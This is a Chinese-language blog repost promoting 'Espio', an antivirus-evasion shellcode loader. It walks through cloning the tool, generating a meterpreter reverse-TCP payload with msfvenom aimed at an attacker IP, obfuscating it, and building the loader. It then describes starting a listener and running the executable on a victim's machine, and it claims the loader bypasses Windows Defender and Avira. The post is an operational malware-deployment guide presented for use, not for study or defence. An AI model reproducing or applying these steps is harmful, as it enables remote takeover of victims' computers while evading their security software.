【免杀系列】Espio 过小红伞、AV

admin 2023年6月19日09:09:26评论48 views字数 867阅读2分53秒阅读模式
【免杀系列】Espio 过小红伞、AV特征
  • 混淆 - 使用随机生成的密钥进行 base64 编码和 XOR 加密。
  • Sandbox Bypass - 自定义休眠功能。
  • DLL Unhooking - ntdll.dll 的完全脱钩
  • 进程注入 - 将有效负载注入 werfault.exe

用法

1.克隆存储库:

git clone https://github.com/Konis-Bros/Espio.git

2.生成Shell代码。在此演示中,我们将在 kali 机器中使用 msfvenom:

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<Attacker IP> LPORT=1337 -f raw -o shellcode

3.将shellcode放入克隆的仓库中,使用obfuscator.py工具进行混淆:

python3 obfuscator.py shellcode

注意:然后我们的 shellcode 使用key.bin密钥被混淆为obfuscatedPayload.bin并保存在 loader/Espio 中。

4.打开 loader/Espio.sln,Visual Studio 解决方案文件。

5.构建项目。请注意,可执行文件将位于 loader/x64/Debug/Espio.exe。

6.在攻击者的机器上,侦听定义端口上的 TCP 连接。在我们的例子中,在端口 1337 上运行 metasploit 的 multi/handler。

7.将可执行文件放到受害者的机器上并运行它。

建议

  • 在第 2 步和第 6 步中,通过 HTTPS 创建 meterpreter 会话。有关详细信息,请参阅Meterpreter HTTP/HTTPS 通信。
  • 在第 5 步中,将构建配置从 Debug 更改为 Release。请注意,可执行文件现在位于 loader/x64/Release/Espio.exe。
测试
Espio 接受了以下检查:
Windows Defender的:

【免杀系列】Espio 过小红伞、AV

小红伞 Prime:

【免杀系列】Espio 过小红伞、AV

AV

【免杀系列】Espio 过小红伞、AV

项目地址:

https://github.com/Konis-Bros/Espio

原文始发于微信公众号(Ots安全):【免杀系列】Espio 过小红伞、AV

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月19日09:09:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【免杀系列】Espio 过小红伞、AVhttp://cn-sec.com/archives/1816386.html

发表评论

匿名网友 填写信息